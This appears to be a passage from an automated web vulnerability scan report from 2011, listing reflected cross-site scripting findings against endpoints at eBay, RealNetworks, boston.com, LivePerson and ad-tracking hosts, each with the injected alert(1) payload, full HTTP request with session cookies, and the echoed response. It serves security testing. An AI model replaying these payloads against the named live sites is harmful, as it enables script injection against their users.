GET /server/pixel.htm?fpid=4&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dOXvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:07 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=4472778436510522482&fpid=4&nu=n&t=&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.115. http://rd.rlcdn.com/rd [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /rd

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8523f%3balert(1)//7a5f5e8a821 was submitted in the var parameter. This input was echoed as 8523f;alert(1)//7a5f5e8a821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rd?site=42664&type=js&var=s_1_Integrate_Rapleaf_get_08523f%3balert(1)//7a5f5e8a821&rnd=6123389569118 HTTP/1.1
Host: rd.rlcdn.com
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:02:48 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Cache-Control: no-cache, no-store
Content-Length: 63

var s_1_Integrate_Rapleaf_get_08523f;alert(1)//7a5f5e8a821={};

4.116. http://realnetworks.com/workarea/csslib/ektronCss.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 2a8d7<script>alert(1)</script>0ec91912e3 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:46 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:46 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss2a8d7<script>alert(1)</script>0ec91912e3 */
/* path:
/* ############################################################# */


4.117. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 9f3a8<script>alert(1)</script>a29b388671c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:10:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:10:47 GMT
Last-Modified: Tue, 19 Jul 2011 20:10:47 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS9f3a8<script>alert(1)</script>a29b388671c
//path:
//################################################################


4.118. http://realnetworks.com/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworks.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload 941d1%0aalert(1)//da580d2ce44 was submitted in the id parameter. This input was echoed as 941d1
alert(1)//da580d2ce44
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /workarea/java/ektronJs.ashx?id=EktronSmartMenuJS+EktronWebToolBarJS+EktronFlexMenuJS941d1%0aalert(1)//da580d2ce44 HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/pressroom/index.aspx
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx; __qca=P0-1586148760-1311106896347; __utma=93573022.528241780.1311106897.1311106897.1311106897.1; __utmb=93573022.1.10.1311106897; __utmc=93573022; __utmz=93573022.1311106897.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:12:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Wed, 18 Jul 2012 20:12:26 GMT
Last-Modified: Tue, 19 Jul 2011 20:12:26 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 55177

function ekMenuEx_classNames(){}ekMenuEx_classNames.button="ekmenu_button";ekMenuEx_classNames.buttonHover="ekmenu_button_hover";ekMenuEx_classNames.buttonSelected="ekmenu_button_selected";ekMenuEx_cl
...[SNIP]...
n().ready(function(){Ektron.EditorsMenu.bindEvents()})};

//################################################################
//ektron registered javascript: js file not found
//id: EktronFlexMenuJS941d1
alert(1)//da580d2ce44

//path:
//################################################################


4.119. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://realnetworksrealarca.tt.omtrdc.net
Path:   /m2/realnetworksrealarca/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8b543<script>alert(1)</script>de66053e04b was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/realnetworksrealarca/mbox/standard?mboxHost=support.gamehouse.com&mboxSession=1311107151665-897688&mboxPage=1311107151665-897688&screenHeight=1200&screenWidth=1920&browserWidth=1065&browserHeight=723&browserTimeOffset=-300&colorDepth=32&mboxXDomain=x-only&mboxCount=1&mbox=gh-global8b543<script>alert(1)</script>de66053e04b&mboxId=0&mboxTime=1311089154536&mboxURL=http%3A%2F%2Fsupport.gamehouse.com%2F&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: realnetworksrealarca.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311107151665-897688.17; Domain=realnetworksrealarca.tt.omtrdc.net; Expires=Tue, 02-Aug-2011 20:26:37 GMT; Path=/m2/realnetworksrealarca
Content-Type: text/javascript
Content-Length: 131
Date: Tue, 19 Jul 2011 20:26:37 GMT
Server: Test & Target

mboxFactories.get('default').get('gh-global8b543<script>alert(1)</script>de66053e04b',0).setOffer(new mboxOfferDefault()).loaded();

4.120. http://rover.ebay.com/idmap/0 [footer&cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /idmap/0

Issue detail

The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8638b%3balert(1)//c4974089122 was submitted in the footer&cb parameter. This input was echoed as 8638b;alert(1)//c4974089122 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback18638b%3balert(1)//c4974089122&_vrdm=1311100564001 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.d63ed1c-13143afa25f
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Tue, 19 Jul 2011 18:36:49 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback18638b;alert(1)//c4974089122(["","",86400]);}catch(e){}

4.121. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 94f58%0a05b7ac25fb8 was submitted in the site parameter. This input was echoed as 94f58
05b7ac25fb8
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=2166117494f58%0a05b7ac25fb8&d_id=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:19:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCDCRCQR=MKNALKKDOIHBFKFFJGNMAODJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2166117494f58
05b7ac25fb8

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

4.122. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload c1850<script>alert(1)</script>7319e07e022 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22b12c8144-b20e-11e0-aa83-a59fd6e1b552%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0c1850<script>alert(1)</script>7319e07e022 HTTP/1.1
Host: sitelife.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
